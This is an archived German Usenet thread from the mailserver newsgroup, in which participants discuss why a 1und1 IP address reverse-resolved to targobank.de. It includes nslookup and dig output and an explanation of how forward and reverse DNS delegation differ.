-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber         |   " Questions are the         | Mailadresse im Header
Mannheim, Germany  |     Beginning of Wisdom "     | http://www.zugschlus.de/
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

[toc] | [prev] | [next] | [standalone]


#5322

FromAndreas Hartmann <andihartmann@01019freenet.de>
Date2016-03-28 06:57 +0200
Message-ID<ndadja$3e5$1@327.eternal-september.org>
In reply to#5295
On 03/26/2016 at 01:10 PM Marc Haber wrote:
> Herbert Kleebauer <klee@unibwm.de> wrote:
>> Entscheidend sind aber eben obige Zeilen. Ein nslookup liefert
>>
>> nslookup 212.227.8.37
>>
>> Name:    targobank.de
>> Address:  212.227.8.37
> 
> Richtig. Aber:

?

nslookup 212.227.8.37
Server:         x
Address:        x#53

** server can't find 37.8.227.212.in-addr.arpa.: NXDOMAIN

Bei sämtlichen von mir geprüften DNS-Servern. Auch bei heise.



Gruß,
Andreas

[toc] | [prev] | [next] | [standalone]


#5323

FromArno Welzel <usenet@arnowelzel.de>
Date2016-03-28 07:20 +0200
Message-ID<56F8BF07.2030204@arnowelzel.de>
In reply to#5322
Andreas Hartmann schrieb am 2016-03-28 um 06:57:

> On 03/26/2016 at 01:10 PM Marc Haber wrote:
>> Herbert Kleebauer <klee@unibwm.de> wrote:
>>> Entscheidend sind aber eben obige Zeilen. Ein nslookup liefert
>>>
>>> nslookup 212.227.8.37
>>>
>>> Name:    targobank.de
>>> Address:  212.227.8.37
>>
>> Richtig. Aber:
> 
> ?
> 
> nslookup 212.227.8.37
> Server:         x
> Address:        x#53
> 
> ** server can't find 37.8.227.212.in-addr.arpa.: NXDOMAIN
> 
> Bei sämtlichen von mir geprüften DNS-Servern. Auch bei heise.

Ja - JETZT, da die fraglichen Einträge offenbar gelöscht wuden. Aber vor
etwa 2 Tagen war das anders.



-- 
Arno Welzel
http://arnowelzel.de
http://de-rec-fahrrad.de
http://fahrradzukunft.de

[toc] | [prev] | [next] | [standalone]


#5351

FromAndreas Hartmann <andihartmann@01019freenet.de>
Date2016-03-28 08:22 +0200
Message-ID<ndaiid$3kv$1@327.eternal-september.org>
In reply to#5323
On 03/28/2016 at 07:20 AM Arno Welzel wrote:
> Andreas Hartmann schrieb am 2016-03-28 um 06:57:
> 
>> On 03/26/2016 at 01:10 PM Marc Haber wrote:
>>> Herbert Kleebauer <klee@unibwm.de> wrote:
>>>> Entscheidend sind aber eben obige Zeilen. Ein nslookup liefert
>>>>
>>>> nslookup 212.227.8.37
>>>>
>>>> Name:    targobank.de
>>>> Address:  212.227.8.37
>>>
>>> Richtig. Aber:
>>
>> ?
>>
>> nslookup 212.227.8.37
>> Server:         x
>> Address:        x#53
>>
>> ** server can't find 37.8.227.212.in-addr.arpa.: NXDOMAIN
>>
>> Bei sämtlichen von mir geprüften DNS-Servern. Auch bei heise.
> 
> Ja - JETZT, da die fraglichen Einträge offenbar gelöscht wuden. Aber vor
> etwa 2 Tagen war das anders.


 dig +short NS targobank.de
ldnsie1p.e-i.net.
ldnsse2p.e-i.net.
ldnsie2p.e-i.net.
ldnsse1p.e-i.net.

In anderen Worten: die Domain targobank.de ist registriert und wird vom
oben genannten NS bedient.
Wie ist es möglich, dass sämtliche (nicht gekaperten) DNS-Server
weltweit Informationen für eine beliebige Domain ausliefern (in dem Fall
den Reverse-Lookup), welche nicht vom Domaininhaber selbst eingestellt
wurden?


Gruß,
Andreas

[toc] | [prev] | [next] | [standalone]


#5354

From"Juergen P. Meier" <nospam-1984@jors.net>
Date2016-03-29 06:09 +0000
Message-ID<35704.25278.1459231789@news.jors.net>
In reply to#5351
Andreas Hartmann <andihartmann@01019freenet.de>:
> On 03/28/2016 at 07:20 AM Arno Welzel wrote:
>> Ja - JETZT, da die fraglichen Einträge offenbar gelöscht wuden. Aber vor
>> etwa 2 Tagen war das anders.
>
>
>  dig +short NS targobank.de
> ldnsie1p.e-i.net.
> ldnsse2p.e-i.net.
> ldnsie2p.e-i.net.
> ldnsse1p.e-i.net.
>
> In anderen Worten: die Domain targobank.de ist registriert und wird vom
> oben genannten NS bedient.
> Wie ist es möglich, dass sämtliche (nicht gekaperten) DNS-Server
> weltweit Informationen für eine beliebige Domain ausliefern (in dem Fall
> den Reverse-Lookup), welche nicht vom Domaininhaber selbst eingestellt
> wurden?

Vorsicht! Du verwechelst Forward mit Reverse.

DNS ist streng Hierarchisch, und fuer die Domain

	targobank.de.

sind in der Reihenfolge jeweils folgende NS als *Autoritaet* zustaendig:

	fuer . die Root-NS des IANA Namensraums des Internets
	fuer de die NS des DeNIC
	fuer targobank die NS von E-I.

Fuer den Reverse der IP-Adresse 212.227.8.37 hingegen, der ja
in DNS-Schreibweise 37.8.227.212.in-addr.arpa. lautet, sind das:

	fuer . die root-NS des IANA Namensraums des Intereets
	fuer arpa die root-NS des IANA Namensraums des Interenets*
	fuer in-addr die root-NS des IANA Namensraums des Interenets
	fuer 212 sind das die Nameserver des RIPE (ripe.net)
	fuer 227 sind das bereits die NS von 1und1, weil das ein
kompletter /16 Netzblock ist, der an 1und1 vergeben wurde.
	fuer 8 ebenso
	und auch fuer 37.

* wurde vom US-Verteidigungsministerium fuer in-addr an die IANA delegiert

Ich hoffe du verstehst damit, warum das eine (vorwaertsaufloesung
eines Namens in eine IP-Adresse) mit dem anderen
(rueckwaertsaufloesung einer IP-Adresse in einen Namen) in der Regel
nichts mit einander zu tun haben.

Nur wer die Hoheit ueber den NAmensraum der Domain (vorwaerts) *und*
die Hoheit ueber den Namensraum der IP-Adresse (unterhalb von
in-addr.arpa) innehaelt, kann einen zirkulaer geschlossenen DNS
Eintrag anlegen, wo vorwaerts- und rueckwaerts jeweils auf den anderen
Eintrag aufgeloest werden.

Und nur der ist berechtigter Inhaber von IP *und* Domain.


Jeder Domaininhaber kann beliebig fremde IP-Adressen setzen
(Beispiel: blafasel.jors.net)
und jeder IP-Netzinhaber kann* beliebig fremde Domainnamen setzen
(Das beispiel hier war ja genau der Schlund-server dessen IP auf
"targobank.de" aufloest, obwohl der damit nichts zu tun hatte).

*fuer geeignete Werte von "kann", z.B. solange der Provider das nicht
verhindert.

Juergen
-- 
Juergen P. Meier - "This World is about to be Destroyed!"
end
If you think technology can solve your problems you don't understand
technology and you don't understand your problems.  (Bruce Schneier)

[toc] | [prev] | [next] | [standalone]


#5359

FromAndreas Hartmann <andihartmann@01019freenet.de>
Date2016-04-03 07:43 +0200
Message-ID<ndqahn$392$1@327.eternal-september.org>
In reply to#5354
On 03/29/2016 at 08:09 AM Juergen P. Meier wrote:
> Andreas Hartmann <andihartmann@01019freenet.de>:
>> On 03/28/2016 at 07:20 AM Arno Welzel wrote:
>>> Ja - JETZT, da die fraglichen Einträge offenbar gelöscht wuden. Aber vor
>>> etwa 2 Tagen war das anders.
>>
>>
>>  dig +short NS targobank.de
>> ldnsie1p.e-i.net.
>> ldnsse2p.e-i.net.
>> ldnsie2p.e-i.net.
>> ldnsse1p.e-i.net.
>>
>> In anderen Worten: die Domain targobank.de ist registriert und wird vom
>> oben genannten NS bedient.
>> Wie ist es möglich, dass sämtliche (nicht gekaperten) DNS-Server
>> weltweit Informationen für eine beliebige Domain ausliefern (in dem Fall
>> den Reverse-Lookup), welche nicht vom Domaininhaber selbst eingestellt
>> wurden?
> 
> Vorsicht! Du verwechelst Forward mit Reverse.
> 
> DNS ist streng Hierarchisch, und fuer die Domain
> 
> 	targobank.de.
> 
> sind in der Reihenfolge jeweils folgende NS als *Autoritaet* zustaendig:
> 
> 	fuer . die Root-NS des IANA Namensraums des Internets
> 	fuer de die NS des DeNIC
> 	fuer targobank die NS von E-I.
> 
> Fuer den Reverse der IP-Adresse 212.227.8.37 hingegen, der ja
> in DNS-Schreibweise 37.8.227.212.in-addr.arpa. lautet, sind das:
> 
> 	fuer . die root-NS des IANA Namensraums des Intereets
> 	fuer arpa die root-NS des IANA Namensraums des Interenets*
> 	fuer in-addr die root-NS des IANA Namensraums des Interenets
> 	fuer 212 sind das die Nameserver des RIPE (ripe.net)
> 	fuer 227 sind das bereits die NS von 1und1, weil das ein
> kompletter /16 Netzblock ist, der an 1und1 vergeben wurde.
> 	fuer 8 ebenso
> 	und auch fuer 37.
> 
> * wurde vom US-Verteidigungsministerium fuer in-addr an die IANA delegiert
> 
> Ich hoffe du verstehst damit, warum das eine (vorwaertsaufloesung
> eines Namens in eine IP-Adresse) mit dem anderen
> (rueckwaertsaufloesung einer IP-Adresse in einen Namen) in der Regel
> nichts mit einander zu tun haben.

Danke für die technische Erklärung bzw. den Status Quo.

> Nur wer die Hoheit ueber den NAmensraum der Domain (vorwaerts) *und*
> die Hoheit ueber den Namensraum der IP-Adresse (unterhalb von
> in-addr.arpa) innehaelt, kann einen zirkulaer geschlossenen DNS
> Eintrag anlegen, wo vorwaerts- und rueckwaerts jeweils auf den anderen
> Eintrag aufgeloest werden.
> 
> Und nur der ist berechtigter Inhaber von IP *und* Domain.
> 
> 
> Jeder Domaininhaber kann beliebig fremde IP-Adressen setzen
> (Beispiel: blafasel.jors.net)
> und jeder IP-Netzinhaber kann* beliebig fremde Domainnamen setzen
> (Das beispiel hier war ja genau der Schlund-server dessen IP auf
> "targobank.de" aufloest, obwohl der damit nichts zu tun hatte).

Genau das ist das von mir angesprochene Problem! Diese Variante sollte
organisatorisch unterbunden werden! Niemand hindert die jeweils
Vergebenden miteinander zu "reden"! Dann würde die Nummer schon am
Anfang auffliegen.


Gruß,
Andreas

[toc] | [prev] | [next] | [standalone]


Page 1 of 4  [1] 2 3 4  Next page →

Back to top | Article view | de.comm.software.mailserver


csiph-web